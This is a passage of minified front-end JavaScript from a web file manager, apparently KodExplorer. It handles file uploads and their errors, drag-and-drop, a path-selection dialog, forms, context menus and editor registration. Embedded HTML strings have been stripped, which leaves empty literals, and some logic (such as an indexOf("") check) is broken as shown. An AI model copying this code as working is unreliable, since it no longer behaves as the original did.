    ';(1e3==o||2e3==o)&&Tips.tips(LNG.upload_tips_more,"warning");var l=function(){if(0==e.size&&i){ui.path.pathOperate.newFile(e.upload_to+i),uploader.skipFile(e),uploader.removeFile(e),s++,o++;var t=$("#"+e.id);t.addClass("success").find(".state").text(LNG.upload_success).parent().find(".remove").addClass("icon-ok").addClass("open").removeClass("icon-remove").removeClass("remove")}},c=function(){uploader.upload(),setTimeout(function(){l()},200)};0==n.length?setTimeout(function(){$(".uploader-list").prepend(r),c()},200):(n.prepend(r),c())}).on("uploadBeforeSend",function(e,t,a){var i=urlEncode(e.file.fullPath);(void 0==i||"undefined"==i)&&(i=""),t.fullPath=i,t.upload_to=e.file.upload_to,a["X-CSRF-TOKEN"]=Cookie.get("X-CSRF-TOKEN")}).on("uploadProgress",function(e,t){var a=(100*t).toFixed(1)+"%";$(".dialog-file-upload .aui-title").text(LNG.uploading+": "+s+"/"+o+" ("+r+")"),Title.set(s+"/"+o+"("+a+","+r+")");var i=c(e,t),n=$("#"+e.id),l=n.find(".progress .progress-bar");l.length||(l=$('
    ').appendTo(n).find(".progress-bar")),n.find(".state").text(a+"("+i+")"),l.css("width",a)}).on("uploadAccept",function(e,t){if(e.file.serverData=t,!t.code)return e.serverNeedRetry=!0,!1;try{e.file.fullPath||d.push(t.info)}catch(a){}}).on("uploadSuccess",function(e){var t=$("#"+e.id);if(!t.inScreen()){var a=36*t.index(".item");$(".uploader-content").scrollTop(a)}s++;var i=e.serverData;if(i&&i.data){var n=LNG[i.data];if(i.code){if(t.addClass("success"),t.find(".state").text(n),t.find(".remove").addClass("icon-ok").addClass("open").removeClass("icon-remove").removeClass("remove"),i.info){var o="/"+ltrim(htmlEncode(i.info),"/");t.find(".info .title").html(core.pathThis(o)).attr("title",o).attr("data-name",o)}}else t.addClass("error").find(".state").addClass("error"),t.find(".state").text(n).attr("title",n)}uploader.removeFile(e),t.find(".progress").fadeOut(),e.fullPath||p(!1)}).on("uploadError",function(e,t){var a=LNG.upload_error+"("+t+")";if(e.serverData){var i=5;if((-1!==e.serverData._raw.indexOf("[Error Code:1001]")||-1!==e.serverData._raw.indexOf("[Error Code:1002]")||-1!==e.serverData._raw.indexOf("[Error Code:1010]"))&&(e.errorNum||(e.errorNum=0),e.errorNum++,i>=e.errorNum))return uploader.retry(e),void 0;if(-1!==e.serverData._raw.indexOf(""))return $.each(uploader.getFiles(),function(e,t){uploader.skipFile(t),uploader.removeFile(t)}),Tips.tips("login error!",!1),void 0;if(e.serverData.data){var n=e.serverData.data;a=LNG[n]?LNG[n]:n}else e.serverData._raw&&(a=e.serverData._raw)}"http"==t&&(a=LNG.upload_error_http),"abort"==t&&void 0==e.serverData&&(a=LNG.not_support+"(support on chrome)"),s++,$("#"+e.id).find(".progress").fadeOut(),$("#"+e.id).addClass("error").find(".state").addClass("error"),$("#"+e.id).find(".state").html(a).attr("title",a)}).on("uploadFinished",function(){$(".dialog-file-upload .aui-title").text(LNG.upload_success+": "+s+"/"+o),Title.reset(),o=0,s=0,uploader.reset(),p(!0)}).on("error",function(e){Tips.tips(e,!1)});var u;inState=!1,dragOver=function(){if(0==inState){if(inState=!0,!core.uploadCheck(void 0,!1))return;var e='
    '+LNG.upload_drag_tips+"
    ";MaskView.tips(e),$("#windowMaskView").css({background:"#4285f4",opacity:"0.8"})}u&&window.clearTimeout(u)},dragLeave=function(e){stopPP(e),u&&window.clearTimeout(u),u=window.setTimeout(function(){inState=!1,MaskView.close()},100)},dragDrop=function(e){try{if(e=e.originalEvent||e,core.uploadCheck())if(e.dataTransfer.files.length>0&&e.dataTransfer.files[0].name)core.upload(),core.playSound("drag_upload");else{var t=e.dataTransfer.getData("text/plain");t&&"http"==t.substring(0,4)&&ui.path.pathOperate.appAddURL(t)}stopPP(e)}catch(e){}inState&&(inState=!1,MaskView.close())}}}}),define("app/common/core.api",[],function(){var e=function(e,t,a){var i=$(a.DOM.wrap),n=t.frames.OpenpathSelectApi,o='';"file"==e.type&&(o+=''+e.allowExt+""),$(o).insertBefore(i.find(".aui-state-highlight"));var s=function(t){var a=e.allowExt.split("|"),i=core.pathExt(t);return""==e.allowExt||""!=e.allowExt&&-1!=$.inArray(i,a)?!0:!1},r=function(){var t=n.ui.fileLight.fileListSelect(),a=[];if(e.single){var i=$(t.get(0));if("all"==e.type&&0==t.length)a={file:[],folder:[]};else if("file"==e.type&&0==t.length)a=[];else if("folder"==e.type)a=[n.G.thisPath],i.hasClass("folder-box")&&(a=[n.ui.fileLight.path(i)]);else if("file"==e.type){if(i.hasClass("file-box")){var o=n.ui.fileLight.path(i);s(o)&&(a=[o])}}else if("all"==e.type)if(i.hasClass("folder-box")){var o=n.ui.fileLight.path(i);a=[{file:[],folder:[o]}]}else if(i.hasClass("file-box")){var o=n.ui.fileLight.path(i);s(o)&&(a={file:[o],folder:[]})}}else{var r=[],l=[];t.each(function(){if($(this).hasClass("file-box")){var e=n.ui.fileLight.path($(this));s(e)&&r.push(e)}else $(this).hasClass("folder-box")&&l.push(n.ui.fileLight.path($(this)))}),"folder"==e.type?a=l:"file"==e.type?a=r:"all"==e.type&&(a={file:r,folder:l})}c(a)},l=function(e){var e=trim(e,"/");return e==G.KOD_GROUP_ROOT_SELF||e==G.KOD_GROUP_ROOT_ALL||e==G.KOD_USER_FAV||e==G.KOD_USER_SHARE?!1:!0},c=function(t){var a=i.find(".path-select-input"),o=i.find(".aui-state-highlight");if("all"!=e.type){for(var s=[],r=0;t.length>r;r++)l(t[r])&&s.push(t[r]);t=s}if(0==t.length||"all"==e.type&&0==t.file.length&&0==t.folder.length)o.addClass("disable"),a.attr("result",""),a.val("");else{var c=hashEncode(jsonEncode(t)),d="";if(e.single)d=n.core.pathThis(t[0]);else{var p=t;"all"==e.type&&(p=t.folder.concat(t.file)),$.each(p,function(e,t){d+=n.core.pathThis(t)+", "})}o.removeClass("disable"),a.attr("result",c),a.val(d)}},d=function(){n.ui.fileLight.select.hook("select",n.ui.fileLight,{before:function(){},after:function(){r()}})};n.kodReady||(n.kodReady=[]),n.kodReady.push(function(){d(),r()})};return{pathSelect:function(t,a){var i={type:"file",title:LNG.path_api_select_file,single:!0,allowExt:"",firstPath:!1},n=G.appHost+"/explorer&type=iframe";t=$.extend(i,t),t.firstPath&&(n+="&path="+t.firstPath);var o=ShareData.frameTop(),s=o.$.dialog.open(n,{id:"pathSelectApi",resize:!0,fixed:!0,top:0,ico:core.icon("folder"),title:t.title,lock:!0,background:"#000",opacity:.1,width:920,height:520,ok:function(){if("function"==typeof a){var e=s.DOM.wrap,i=e.find(".path-select-input").attr("result");if(i=hashDecode(i),!i)return Tips.tips(LNG.error,!1),void 0;i=jsonDecode(i),i?t.single&&"all"!=t.type?a(i[0]):a(i):Tips.tips(LNG.error,!1)}},cancel:!0});e(t,o,s)},randomImage:function(e){$.getJSON("//kodcloud.com/tools/version/?wallpage/index&lang="+G.lang+"&callback=?",function(t){"function"==typeof e&&e(t)})}}}),define("app/common/core.playSound",[],function(){var e={file_remove:"file_remove.mp3",recycle_clear:"recycle_clear.mp3",folder_open:"folder_open.mp3",window_min:"window_min.mp3",error:"error_tips.mp3",drag_upload:"drag_upload.mp3",drag_drop:"drag_drop.mp3"},t=function(e){var t=G.staticPath+"others/sound/"+e;Hook.trigger("playSound",t)};return{playSoundFile:t,playSound:function(a){G&&G.userConfig&&"1"==G.userConfig.soundOpen&&setTimeout(function(){t(e[a])},50)}}}),define("app/common/core.formMake",[],function(e){var t,a,i,n={user:!1,group:!1,role:!1},o=function(){t=$("#"+a),t.find(".tab-group .tab-item").length>1?s():t.find(".tab-group").addClass("hidden"),t.find(".form-row.form-slider").exists()&&r(),t.find(".form-row.form-dateTime").exists()&&l(),t.find(".form-row.form-color").exists()&&c(),t.find(".form-row.form-fileSelect").exists()&&d(),t.find(".form-row select").exists()&&p(),t.find(".form-row.form-userSelect").exists()&&u(),t.find(".form-row.error [name]").die("change").live("change",function(){$(this).parents(".form-row.error").removeClass("error")}),t.find(".form-userSelect").die("click").live("click",function(){$(this).removeClass("error")})},s=function(){var e=t.find(".tab-content .tab-pane"),a=t.find(".tab-group .tab-item");e.each(function(){var i=$(this).attr("id"),n=t.find("."+i);n.length>0?n.appendTo($(this)):(e.filter("#"+i).remove(),a.find('[data-id="'+i+'"]').parent().remove())}),a.click(function(){a.removeClass("active"),$(this).addClass("active");var t=$(this).find("a").attr("data-id");e.removeClass("active"),e.filter("#"+t).addClass("active")})},r=function(){seajs.use("lib/bootstrap-slider/bootstrap-slider.css"),seajs.use("lib/colorpicker/css/colorpicker.css"),e.async("lib/bootstrap-slider/bootstrap-slider.js",function(){t.find(".form-slider input").slider()})},l=function(){e.async(["lib/jquery.datetimepicker/jquery.datetimepicker.css","lib/jquery.datetimepicker/jquery.datetimepicker.js"],function(){var e="zh-CN"==G.lang||"zh-TW"==G.lang?"ch":"en";t.find(".form-dateTime input").each(function(){var t=$(this).attr("data-format"),a=["Y","y","L","F","M","t","n","m","d","D","j","l","N","S","W","z","w"],i=["H","h","i","s","A","a","b","g","G","O","P","c","U"],n=!1,o=!1;t||(t="Y/m/d");for(var s=0;a.length>s;s++)if(-1!==t.indexOf(a[s])){n=!0;break}for(var s=0;i.length>s;s++)if(-1!==t.indexOf(i[s])){o=!0;break}$(this).datetimepicker({format:t,datepicker:n,timepicker:o,lang:e}).blur(function(){$(this).trigger("change")})})}),t.find(".form-dateTime .input-btn-right").unbind("click").click(function(){$(this).parent().find("input").focus()})},c=function(){e.async("lib/colorpicker/js/colorpicker",function(){t.find(".form-color input").ColorPicker({onBeforeShow:function(e){$(e).attr("input-name",$(this).attr("name")),$(this).ColorPickerSetColor(this.value)},onShow:function(e){return $(e).fadeIn(100),!1},onHide:function(e){return $(e).fadeOut(100),!1},onChange:function(e,t){var a=$($(this).data("colorpicker").el);a.val("#"+t).trigger("change"),a.parent().find(".btn i").css("background",a.val())}}).bind("keyup",function(){$(this).ColorPickerSetColor(this.value),$(this).parent().find(".btn i").css("background",$(this).val())}),t.find(".form-color .input-btn-right").unbind("click").click(function(){$(this).parent().find("input").click()})})},d=function(){t.find(".path-select").die("click").live("click",function(){var e=$(this);core.api.pathSelect({type:"file",title:LNG.path_api_select_image,allowExt:"png|jpg|bmp|gif|jpeg|ico|svg|tiff"},function(t){var t=core.path2url(t);e.parent().find("input[type=text]").val(t).trigger("change")})})},p=function(){seajs.use("lib/select2/css/select2.min.css"),e.async("lib/select2/js/select2.full.min.js",function(){var a=function(t,a){t.on("select2:select",function(e){if(!t.attr("multiple"))return t.select2("close"),void 0;var a=$(e.params.data.element);a.detach(),t.append(a),t.trigger("change.select2")}).on("select2:unselect",function(e){stopPP(e.params.originalEvent)}).on("change",function(){setTimeout(function(){$(window).trigger("resize")},10)}),"group"==a&&t.on("select2:open",function(){e.async("lib/ztree/ztree",function(){h(t,n[a])})});var i=t.attr("data-value");i&&(t.attr("multiple")&&(i=i.split(",")),t.val(i).trigger("change"))};t.find("select").each(function(){var e=$(this),t=e.attr("data-server"),i=!1;"tags"==e.parents(".form-row").attr("data-type")&&(i=!0),t?f(t,function(n){e.select2({data:n,tags:i,tokenSeparators:[","," "],closeOnSelect:!1}),a(e,t)}):(e.select2({closeOnSelect:!1,tags:i,tokenSeparators:[","," "]}),a(e,t))})})},u=function(){var e=t.find(".form-userSelect .btn-group"),a="btn-active",i="hidden";e.find("button").unbind("click").bind("click",function(){var e=$(this).attr("data-type"),t=$(this).parents(".btn-group"),n=t.parent().find(".user-select"),o=t.parent().find(".user-select-"+e);n.filter(":visible"),t.attr("multiple")?"all"==e?(t.find("button").removeClass(a),$(this).addClass(a),n.addClass(i),o.removeClass(i)):($(this).toggleClass(a),o.toggleClass(i),$(this).hasClass(a)?t.find("[data-type=all]").removeClass(a):t.find("."+a).exists()||t.find("[data-type=all]").addClass(a)):(t.find("button").removeClass(a),$(this).addClass(a),n.addClass(i),o.removeClass(i))})},f=function(e,t){var a=function(e){var t=[];for(var a in e)t.push({id:a,text:e[a].name});return t};if(n[e]&&t)return t(a(n[e])),void 0;var i={user:G.appHost+"systemMember/get",group:G.appHost+"systemGroup/get",role:G.appHost+"systemRole/get"};return null==n[e]?(Hook.bind("loadDataServer-"+e,function(){t(a(n[e]))}),void 0):(n[e]=null,$.ajax({url:i[e],dataType:"json",error:function(){n[e]=!1,Tips.tips(LNG.system_error,0)},success:function(i){return i.code?(n[e]=i.data,t&&t(a(n[e])),Hook.trigger("loadDataServer-"+e),void 0):(Tips.tips(i),void 0)}}),void 0)},h=function(e,t){var a=function(e){var t=function(e){for(var a=0;e.length>a;a++)void 0!=e[a]?(e[a].pid=e[a].parentID,e[a].id=e[a].groupID,delete e[a].children,delete e[a].parentID,delete e[a].groupID,e[a].child&&(e[a].children=e[a].child,delete e[a].child,t(e[a].children))):delete e[a]},a=[],i=$.extend(!0,{},e);for(var n in i){var o=i[n],s=o.parentID;if(i[s])i[s].child||(i[s].child=[]),i[s].child.push(i[o.groupID]);else{var r=i[o.groupID];r&&a.push(r)}}return t(a),a},i={view:{showLine:!1,selectedMulti:!1,dblClickExpand:!1,addDiyDom:function(e,t){var a=12,i=$("#"+e+" #"+t.tId+"_switch"),n=$("#"+e+" #"+t.tId+"_ico");if(n.before(i).after('').before(''+core.iconSmall("group-guest")+"").removeClass("ico_docu").addClass("group_icon").remove(),t.level>=1){var o="";i.before(o)}$("#"+e+" #"+t.tId+"_a").attr("data-group-id",t.id)}},callback:{onClick:function(e,t,a){n(t,a)}}},n=function(t,a){var i=$("#"+a.tId+"_a");if(i.removeClass("curSelectedNode"),e.attr("multiple")){i.toggleClass("this");var n=e.val();$.isArray(n)||(n=[]),i.hasClass("this")?n.push(a.id):n=_.without(n,a.id),$.each(n,function(){var t=e.find("[value="+this+"]");t.detach(),e.append(t)}),e.val(n).trigger("change")}else $("#"+t+" [treenode_a].this").removeClass("this"),i.toggleClass("this"),e.val(a.id).trigger("change"),e.select2("close")},o=function(){var t=e.val(),a=$(".select2-container--open .group-list-tree").attr("id"),i=$.fn.zTree.getZTreeObj(a);$("#"+a+" [treenode_a]").removeClass("this"),"string"==typeof t&&(t=[t]),t&&i.getNodesByFilter(function(e){inArray(t,e.id+"")&&$("#"+e.tId+"_a").addClass("this")})},s=function(e){var t=$(".select2-container--open .group-list-content");t.find(".select2-results__options,.group-list-tree").removeClass("hidden"),"search"==e?t.find(".group-list-tree").addClass("hidden"):t.find(".select2-results__options").addClass("hidden")},r=function(t){var n=function(e){e.unbind("change input").bind("change input",function(){$(this).val().length>0?s("search"):s("tree")})};if(e.attr("multiple")?n(e.parent().find(".select2-search__field")):n($(".select2-container--open .select2-search__field")),$(".select2-container--open .group-list-tree").exists())return o(),s("tree"),void 0;e.on("open",function(){o()}).on("select2:unselect",function(){o()});var r=UUID(),l='
    ';$(l).appendTo(".select2-container--open .select2-results"),$(".select2-container--open .select2-results__options").addClass("hidden").parent().addClass("group-list-content");var c=a(t);$.fn.zTree.init($("#"+r),i,c);var d=$.fn.zTree.getZTreeObj(r);d&&d.expandAll(!0),o(),s("tree")};r(t)},m=function(){var e={},a=[],n=function(e){for(var t={all:"0",user:"",group:"",role:""},a=e.split(";"),i=0;a.length>i;i++){var n=a[i].split(":");2==n.length&&(t[n[0]]=n[1])}return"0"!=t.all||t.user||t.group||t.role?!0:!1};if(t.find(".form-row").each(function(){var t=$(this),o=$(this).attr("data-type"),s=$(this).find("[name]");$(this).find(".setting-title .require").exists();var r=s.attr("name"),l=!1;switch(o){case"input":case"textarea":case"password":case"number":case"slider":case"color":case"dateTime":case"fileSelect":l=s.val();break;case"switch":l=s.prop("checked")+0+"";break;case"radio":l=s.filter(":checked").attr("value");break;case"checkbox":l=[],s.filter(":checked").each(function(){l.push($(this).val())}),l=l.join(",");break;case"select":case"selectMutil":case"tags":case"group":case"role":case"user":l=s.val(),$.isArray(l)&&(l=l.join(",")),null==l&&(l="");break;case"userSelect":var c={all:"0",user:"",group:"",role:""};t.find(".btn-group .btn-active").each(function(){var e=$(this).attr("data-type"),a="1";"all"!=e&&(a=$(t).find(".user-select-"+e+" select").val(),$.isArray(a)&&(a=a.join(",")),null==a&&(a="")),c[e]=a}),l="all:"+c.all+";user:"+c.user+";group:"+c.group+";role:"+c.role;break;default:}$(this).removeClass("error"),i[r]&&i[r].require&&(l===!1||null===l||"string"==typeof l&&""===l||"userSelect"==i[r].type&&!n(l))?($(this).addClass("error"),a.push({name:r,value:l})):e[r]=l}),a.length>0){Tips.tips(LNG.PluginConfigNotNull,"warning");var o=t.find(".panel-body"),s=t.find(".form-row.error");if(!s.parents(".tab-pane").hasClass("active")){var r=s.parents(".tab-pane").attr("id");t.find('.tab-group [data-id="'+r+'"]').click()}s.inScreen()||o.animate({scrollTop:s.offset().top-o.offset().top+o.scrollTop()},100),s.find("[name]").first().focus(),s.find(".setting-content").flash(3,100)}return{checked:0==a.length,error:a,result:e}},v=function(t){e.async(t,function(e){e&&($.isFunction(e)?e():"object"==typeof e&&e.hasOwnProperty("main")&&$.isFunction(e.main)&&e.main())})},g=function(e){if("string"==typeof e)return v(file),!1;if($.isPlainObject(e.formStyle)&&e.formStyle.loadFile){var t=e.formStyle.loadFile;"string"==typeof t&&(t=[t]),$.isArray(t)&&$(t).each(function(e,t){v(t)})}i=e,a=UUID();var n=template.compile(tplFormMake),o=n({LNG:LNG,items:e,wrapID:a});return o},b=function(e,t,a){var i=g(e);if(!i)return!1;var n={padding:0,fixed:!0,resize:!0,title:LNG.search,ico:core.icon("config"),width:680,height:500,content:i,okVal:LNG.button_save,ok:function(){var e=m();return e.checked?a(e.result):!1}};if($.isPlainObject(t))for(var s in t)n[s]=t[s];var r=$.dialog(n),l=r.DOM.wrap.find(".aui-title").html();return r.DOM.wrap.find(".modal-title").html(l),o(),r};return{makeHtml:g,bindEvent:o,getFormData:m,initDialog:b}}),define("app/common/rightMenuExtence",[],function(){$.contextMenu||($.contextMenu={}),$.contextMenu.show=function(e,t,a){e&&($.contextMenu.hidden(),$(e).contextMenu({x:t,y:a}))},$.contextMenu.menuShow=function(){var e=$(".context-menu-active"),t=e.data("contextMenu");if(e&&t){var a=t.$menu,i="disable";a.find(".disable").addClass(i),Hook.trigger("rightMenu.show",t.selector,e,a),Hook.trigger("rightMenu.show"+t.selector,e,a)}},$.contextMenu.isDisplay=function(){return 0==$(".context-menu-list:visible").length?!1:!0},$.contextMenu.hidden=function(){$(".context-menu-list").filter(":visible").filter(":not(.menu-not-auto-hidden)").trigger("contextmenu:hide")},$.contextMenu.menuAdd=function(e,t,a,i){var n=!1,o=$.contextMenu.menus;for(var s in o)if(o[s].selector==t){n=o[s];break}if(n&&e){var r=function(e){return e?-1!==e.indexOf("/")?'':'':""},l=function(e,t,a,i){var o=[],s={};if(a){for(var c in t)o.push({key:c,value:t[c]});for(var d=o.length-1;d>=0;d--)s[o[d].key]=o[d].value}else s=t;$.each(s,function(t,o){o.className=o.className||"";var s=t+" "+o.className;if("string"==typeof o)var c='
  • ';else{var d=o.name;o.accesskey&&(d+='('+o.accesskey+")");var c='
  • '+r(o.icon)+""+d+"
  • "}var p=$(c).clone();a?e.$menu.find(a).first().after(p):i&&e.$menu.find(i).first().before(p);var u=p.parent(".context-menu-list").data("contextMenu");p.data({contextMenu:u,contextMenuKey:t,contextMenuRoot:n}); +var f={$input:null,$label:null,accesskey:o.accesskey,className:o.className,icon:o.icon,name:o.name,_name:d,$node:p};if(u&&(u.items||(u.items={}),u.items[t]=f),"string"!=typeof o&&(e.commands||(e.commands={}),e.commands[t]=f,n.commands[t]=f,n.callbacks[t]=function(e,t){o.callback(e,t)},o.accesskey&&(n.accesskeys[o.accesskey]=f),o.items)){var c='
    ';$(c).appendTo(p),f.$menu=p.find("ul."+t),f.callback=null,f.appendTo=f.$node,f.type="sub",p.data("contextMenu",f).addClass("context-menu-submenu"),p.find("ul."+t).data({contextMenuRoot:n,contextMenu:f}),p.find("li."+t+"-first").data({contextMenuRoot:n,contextMenuKey:t+"-first",contextMenu:f}),f.items||(f.items={}),f.items[t+"-first"]={$input:null,$label:null,icon:"",name:"",_name:"",$node:p.find("li."+t+"-first")},l(f,o.items,"."+t+"-first")}})};l(n,e,a,i)}};var e=function(){return $('').appendTo("#rightMenu"),"function"!=typeof $.contextMenu?console.info("$.contextMenu is not function!"):($.contextMenu({zIndex:9999,selector:".dialog-menu",items:{"dialog-quit":{name:LNG.close,className:"dialog-quit",icon:"remove",accesskey:"q"},"dialog-max":{name:LNG.dialog_max,className:"dialog-max",icon:"resize-full",accesskey:"a"},"dialog-min":{name:LNG.dialog_min,className:"dialog-min",icon:"minus",accesskey:"i"},sep1:"--------",refresh:{name:LNG.refresh,className:"refresh",icon:"refresh",accesskey:"r"},"open-window":{name:LNG.open_ie,className:"open-window",icon:"globe",accesskey:"b"},qrcode:{name:LNG.qrcode,className:"qrcode",icon:"qrcode",accesskey:"c"}},callback:function(e,t){var a=t.$trigger.attr("id"),i=$.dialog.list[a];switch(e){case"dialog-quit":i.close();break;case"dialog-min":i._clickMin(!1);break;case"dialog-max":i._clickMax();break;case"refresh":i.refresh();break;case"open-window":i.openWindow();break;case"qrcode":core.qrcode(i.DOM.wrap.find("iframe").attr("src"));break;default:}}}),$(".aui-title img,.aui-title .x-item-file").die("click").live("click",function(e){var t=$(this).offset();t.top+=$(this).outerHeight(),$(this).parent().parent().contextMenu({x:e.pageX,y:t.top})}).die("dblclick").live("dblclick",function(){var e=$(this).parent().parent().attr("id"),t=$.dialog.list[e];t.close(),$.contextMenu.hidden()}),void 0)};Hook.bind("rightMenu.show.dialog-menu",function(e,t){var a=e.attr("id"),i=$.dialog.list[a],n="hidden",o=".open-window,.refresh,.qrcode,.context-menu-separator";i.hasFrame()?t.find(o).removeClass(n):t.find(o).addClass(n);var s=".dialog-min,.dialog-max";$("."+a).hasClass("dialog-can-resize")?t.find(s).removeClass(n):t.find(s).addClass(n)}),e()}),define("app/app/appBase",[],function(){var e={},t={},a={},i=!1,n=function(a){a.title=void 0==a.title?a.name:a.title,void 0==a.name&&(a.name=UUID(),a.hidden=!0),e[a.name]=a,a.ext||(a.ext="");var i=a.ext.split(",");e[a.name].extArr=i;for(var n=0;i.length>n;n++){var o=trim(i[n]);e[a.name].extArr[n]=o,t[o]||(t[o]=[]);for(var s=!1,r=0;t[o].length>r;r++)if(t[o][r].name==a.name){s=!0;break}if(!s){var l=0;a.sort!==void 0&&(l=parseInt(a.sort)),t[o].push({name:a.name,sort:l}),t[o].length>1&&(t[o]=t[o].sort(function(e,t){return e.sortr;r++)o[r].name!=i&&s.push(o[r]);0==s.length?delete t[n]:t[n]=s}},r=function(i){if(i===void 0){var n=[];for(var o in e)e[o].hidden||n.push(e[o]);return n}var s=a[i],n=[];if(!s&&!t[i])return!1;if(s&&(e[s]?n.push(e[s]):delete a[i]),!t[i])return n;for(var r=0;t[i].length>r;r++){var l=t[i][r].name;e[l]&&l!=s&&n.push(e[l])}return n},l=function(e){i=e},c=function(){return i},d=function(t,a,i){a=a?a:core.pathExt(t),i=i?i:"";var n={path:t,ext:a,appName:i};if(!Hook.trigger("kodApp.open.before",n)){if(t=n.path,a=n.ext,i=n.appName)var o=e[i];else{var s=r(a);if(!s||0==s.length)return kodApp.openUnknow(t,""),void 0;var o=s[0]}if(!o)return Tips.tips("["+i+"] not exists",!1);try{o.callback(t,a),Hook.trigger("kodApp.open.after",t,a,o)}catch(l){kodApp.openUnknow(t,""),console.error("kodApp.open error:",l)}}},p=function(t){var a=r(t),i=r("");""==t&&(a=!1),a?a.push({name:""}):a=[],a=a.concat(i);for(var n={},o=0;a.length>o;o++){var s=a[o];""==s.name||s.hidden?n["step-line"]="-------":n[s.name]={app:s.name,name:s.title,className:s.className,icon:s.icon,callback:function(t){var a=e[t];if(a&&a.callback){if($(".context-menu-active"),$(".context-menu-active").hasClass("menu-tree-file"))var i=ui.tree.makeParam();else var i=ui.path.makeParam();a.callback(i.path,i.type)}}}}return n},u=function(e,t){f(e,t),G.userConfig.kodAppDefault=htmlEncode(jsonEncode(a)),G.shareInfo||$.get(G.appHost+"setting/set&k=kodAppDefault&v="+jsonEncode(a))},f=function(t,i){if("string"==typeof t)a[t]=i;else if($.isArray(t))for(var n=0;t.length>n;n++)a[t[n]]=i;else if(e[i]&&$.isArray(e[i].extArr))for(var o=e[i].extArr,n=0;o.length>n;n++)a[o[n]]=i},h=function(){G.userConfig.kodAppDefault="[]",a={}},m=function(t,a){var t=e[t];return t?a?inArray(t.extArr,a):t.ext:!1},v=function(a,i,n){var a=e[a];if(!a)return!1;var o="undefined"==n?0:parseInt(n);0==o&&a.sort!==void 0&&(o=parseInt(a.sort)),"string"==$.type(i)&&(i=i.split(","));for(var s=0;i.length>s;s++){var r=i[s];if(r){inArray(a.extArr,r)||a.extArr.push(r),t[r]||(t[r]=[]);for(var l=!1,c=0;t[r].length>c;c++)t[r][c].name!=a.name||(t[r][c].sort=o,l=!0);l||t[r].push({name:a.name,sort:o})}}},g=function(){if(G.userConfig&&G.userConfig.kodAppDefault)try{var e=G.userConfig.kodAppDefault;e=jsonDecode(htmlDecode(e)),$.isPlainObject(e)&&(a=e)}catch(t){}Hook.bind("rightMenu.show.menu-file,rightMenu.show.menu-tree-file",function(e,t){if(e.hasClass("menu-tree-file"))var a=ui.tree.makeParam();else var a=ui.path.makeParam();var i=core.pathExt(a.path),n="hidden";if(kodApp.getApp(i)){var o=kodApp.getAppMenu(i);t.find("li.open-with.context-menu-submenu").removeClass(n),t.find("ul.context-menu-list.open-with .context-menu-item").not(".open-with-first").remove(),$.contextMenu.menuAdd(o,".menu-file",".open-with-first"),$.contextMenu.menuAdd(o,".menu-tree-file",".open-with-first")}else t.find("li.open-with.context-menu-submenu").addClass(n)}),Hook.trigger("kodApp.ready")};return g(),{debug:function(){return{appList:e,openDefault:t,openUser:a}},add:n,remove:s,appSupportCheck:m,appSupportSet:v,getApp:r,getAppBind:o,getAppMenu:p,setLastOpenTarget:l,getLastOpenTarget:c,setOpenUser:u,setOpenUserLocal:f,clearOpenUser:h,open:d}}),define("app/app/editor",[],function(){kodApp.add({name:"aceEditor",title:LNG["Plugin.default.aceEditor"],sort:0,ext:"txt,textile,oexe,inc,csv,log,asc,tsv,lnk,url,webloc,meta,localized,xib,xsd,storyboard,plist,csproj,pch,pbxproj,local,xcscheme,manifest,vbproj,strings,jshintrc,sublime-project,readme,changes,changelog,version,license,changelog,abap,abc,as,asp,aspx,ada,adb,htaccess,htgroups,htgroups,htpasswd,asciidoc,adoc,asm,a,ahk,bat,cmd,cpp,c,cc,cxx,h,hh,hpp,ino,c9search_results,cirru,cr,clj,cljs,cbl,cob,coffee,cf,cson,cakefile,cfm,cs,css,curly,d,di,dart,diff,patch,dockerfile,dot,dummy,dummy,e,ge,ejs,ex,exs,elm,erl,hrl,frt,fs,ldr,ftl,gcode,feature,.gitignore,glsl,frag,vert,gbs,go,groovy,haml,hbs,handlebars,tpl,mustache,hs,hx,html,hta,htm,xhtml,eex,html.eex,erb,rhtml,html.erb,ini,inf,conf,cfg,prefs,io,jack,jade,java,ji,jl,jq,js,jsm,json,jsp,jsx,latex,ltx,bib,lean,hlean,less,liquid,lisp,ls,logic,lql,lsl,lua,lp,lucene,Makefile,makemakefile,gnumakefile,makefile,ocamlmakefile,make,md,markdown,mask,matlab,mz,mel,mc,mush,mysql,nc,nix,nsi,nsh,m,mm,ml,mli,pas,p,pl,pm,pgsql,php,phtml,shtml,php3,php4,php5,phps,phpt,aw,ctp,module,ps1,praat,praatscript,psc,proc,plg,prolog,properties,proto,py,r,cshtml,rd,rhtml,rst,rb,ru,gemspec,rake,guardfile,rakefile,gemfile,rs,sass,scad,scala,scm,sm,rkt,oak,scheme,scss,sh,bash,bashrc,sjs,smarty,tpl,snippets,soy,space,sql,sqlserver,styl,stylus,svg,swift,tcl,tex,toml,twig,swig,ts,typescript,str,vala,vbs,vb,vm,v,vh,sv,svh,vhd,vhdl,wlk,wpgm,wtest,xml,rdf,rss,wsdl,xslt,atom,mathml,mml,xul,xbl,xaml,xq,yaml,yml,vcproj,vcxproj,filters,cer,reg,config,pem,srt,ass,lrc,opf,ncx",icon:G.staticPath+"images/file_icon/icon_app/ace.png",callback:function(e){var t=ShareData.frameTop();if(t.Editor!==void 0)return t.Editor.add(urlEncode(e)),void 0;if(core.isApp("editor"))return ShareData.frameChild("OpenopenEditor",function(t){t.Editor.add(urlEncode(e))}),void 0;if(ShareData.frameTop("OpenopenEditor")){var a=t.$.dialog.list.openEditor,i=0;a&&"hidden"==$(a.DOM.wrap).css("visibility")&&(i=200,a.display(!0).zIndex().focus()),setTimeout(function(){ShareData.frameTop("OpenopenEditor",function(t){t.Editor.add(urlEncode(e))})},i)}else{var n=G.appHost+"editor/edit#filename="+urlEncode(e);G.sharePage!==void 0&&(n=G.appHost+"share/edit&user="+G.user+"&sid="+G.sid+"#filename="+urlEncode(e));var o=htmlEncode(urlDecode(core.pathThis(e)));core.openDialog(n,core.icon("edit"),o,"openEditor")}}});var e=ShareData.frameTop();e.Config&&"editor"==e.Config.pageApp&&kodApp.setOpenUserLocal(!1,"aceEditor")}),define("app/app/openWith",[],function(){kodApp.add({name:"appOpenSetting",title:LNG["Explorer.UI.appSetDefault"],ext:"",icon:G.staticPath+"images/file_icon/icon_others/setting.png",callback:function(e,t){var a="
